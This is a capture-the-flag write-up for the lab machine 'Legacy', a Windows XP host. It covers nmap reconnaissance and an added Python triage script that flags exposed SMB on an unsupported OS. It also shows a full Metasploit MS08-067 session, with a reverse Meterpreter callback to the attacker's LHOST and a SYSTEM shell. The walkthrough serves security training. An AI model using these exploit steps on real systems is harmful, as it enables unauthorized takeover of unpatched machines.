Information About Our Target
- Hostname: Legacy
- IP Address: 10.10.10.4
- Operating System Family: Windows
Abstract / Overview
This machine's SMB service is vulnerable to MS08-067, which allows us to execute arbitrary code in the SYSTEM context.
Information Gathering
Port Scan
1. Surface Scan
We begin with a quick scan of the top 1000 TCP ports, leveraging only nmap's banner-grabbing script.
Output:
# Nmap 7.60 scan initiated Wed Dec 6 09:39:46 2017 as: nmap -sS -T4 -oA 01-tcp-top1k/top-1k --stats-every 60s --max-retries 3 --top-ports 1000 --script banner --reason 10.10.10.4
Nmap scan report for 10.10.10.4
Host is up, received echo-reply ttl 127 (0.023s latency).
Not shown: 997 filtered ports
Reason: 997 no-responses
PORT STATE SERVICE REASON
139/tcp open netbios-ssn syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
3389/tcp closed ms-wbt-server reset ttl 127
# Nmap done at Wed Dec 6 09:40:06 2017 -- 1 IP address (1 host up) scanned in 19.93 seconds
Hm, not much here. We see SMB available on TCP 139 and 445, and a closed Remote Desktop Protocol (RDP) port (TCP 3389). Note the reasons: the RDP port answered with a RST while the other 997 ports gave no response at all, so the host itself is replying and the rest is being filtered. The RDP port hints that we're potentially facing a Windows system, as it's much more common to find RDP on a Windows machine than on Linux. Usually we'd find VNC on a *nix machine.
2. Deep Scan
Since we have an idea of what the host is running, we can now run a more thorough scan of the host, checking all TCP ports (-p-) with service/version detection (-sV). This is going to take longer to run, but will give us significantly more information to work with.
# Nmap 7.60 scan initiated Wed Dec 6 09:40:06 2017 as: nmap -sS -T4 -sV -oA 02-tcp-full/full-tcp --stats-every 60s --max-retries 3 -p- --reason 10.10.10.4
Nmap scan report for 10.10.10.4
Host is up, received echo-reply ttl 127 (0.038s latency).
Not shown: 65532 filtered ports
Reason: 65532 no-responses
PORT STATE SERVICE REASON VERSION
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 127 Microsoft Windows XP microsoft-ds
3389/tcp closed ms-wbt-server reset ttl 127
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Dec 6 10:00:54 2017 -- 1 IP address (1 host up) scanned in 1248.59 seconds
Hm, we didn't get all that much from this. No new ports, but we do now know that this is a Windows XP machine: the service fingerprint on TCP 445 reads "Microsoft Windows XP microsoft-ds" and the Service Info line reports the CPE cpe:/o:microsoft:windows_xp.
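To turn scan output like the above into a defender's triage record, here is an added Python example (not part of the original writeup) that parses nmap's normal output as printed with --reason, using the deep-scan result above as a constructed sample, and flags SMB exposed by an end-of-life operating system. The severity labels and the set of end-of-life CPEs are my own assumptions, not anything nmap emits.

```python
import re

# Constructed sample input: the full-TCP scan output quoted above (nmap run with --reason).
SAMPLE_SCAN = """\
Nmap scan report for 10.10.10.4
Host is up, received echo-reply ttl 127 (0.038s latency).
Not shown: 65532 filtered ports
Reason: 65532 no-responses
PORT STATE SERVICE REASON VERSION
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 127 Microsoft Windows XP microsoft-ds
3389/tcp closed ms-wbt-server reset ttl 127
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
# Port table row as printed with --reason: port/proto state service reason ttl N [version]
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s+(\S+)\s+ttl\s+\d+\s*(.*)$")
CPE_RE = re.compile(r"cpe:/o:[\w:._-]+")

SMB_PORTS = {139, 445}
# Assumed list of operating systems past vendor support; extend with further CPEs as needed.
EOL_OS_CPES = {"cpe:/o:microsoft:windows_xp"}


def parse_scan(text):
    """Reduce nmap normal output to the host, its port rows and the OS CPEs nmap reported."""
    report = {"host": None, "ports": [], "os_cpes": []}
    for line in text.splitlines():
        if m := HOST_RE.match(line):
            report["host"] = m.group(1)
        elif m := PORT_RE.match(line):
            port, proto, state, service, reason, version = m.groups()
            report["ports"].append({"port": int(port), "proto": proto, "state": state,
                                    "service": service, "reason": reason,
                                    "version": version.strip()})
        elif line.startswith("Service Info:"):
            report["os_cpes"] = CPE_RE.findall(line)
    return report


def assess(report):
    """Return triage findings: SMB reachable at all, and SMB served by an unsupported OS."""
    findings = []
    open_smb = sorted(p["port"] for p in report["ports"]
                      if p["state"] == "open" and p["port"] in SMB_PORTS)
    if open_smb:
        findings.append(f"MEDIUM: SMB reachable on {report['host']} (tcp {open_smb})")
    eol = sorted(set(report["os_cpes"]) & EOL_OS_CPES)
    if open_smb and eol:
        findings.append(f"HIGH: SMB exposed by unsupported OS {eol[0]} on {report['host']}; "
                        "no vendor patches for MS08-067-class bugs, isolate or decommission")
    return findings
```

Feeding the first top-1000 scan through the same functions yields only the MEDIUM finding, since that run had no -sV and therefore no Service Info line to supply a CPE.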
Services
Based on this, we know a good deal more about the host. It appears to be running:
- Samba / SMB (TCP 139/445; nmap identifies the service as Microsoft Windows netbios-ssn and microsoft-ds)
Exploitation
Since we know this is a Windows XP machine, we should try our hand at one of the most pervasive SMB vulnerabilities that ever hit Windows XP: MS08-067.
Details on this exploit: https://docs.microsoft.com/en-us/security-updates/securitybulletins/2008/ms08-067
Exploit itself: https://www.rapid7.com/db/modules/exploit/windows/smb/ms08_067_netapi
So let's try this out:
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 10.10.10.4
RHOST => 10.10.10.4
msf exploit(ms08_067_netapi) > set LHOST 10.10.14.5
LHOST => 10.10.14.5
msf exploit(ms08_067_netapi) > set LPORT 443
LPORT => 443
msf exploit(ms08_067_netapi) > exploit
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (179267 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.5:443 -> 10.10.10.4:1029) at 2017-12-06 10:35:17 -0500
meterpreter > sysinfo
Computer : LEGACY
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Domain : HTB
Logged On Users : 1
Meterpreter : x86/windows
meterpreter > shell
Process 1136 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Administrator\Desktop>echo %username%
echo %username%
LEGACY$
Perfect! %username% expands to LEGACY$, the computer account, which is how the SYSTEM account presents itself (machine account usernames are denoted by the $ at the end). We can now dump the user and root proofs!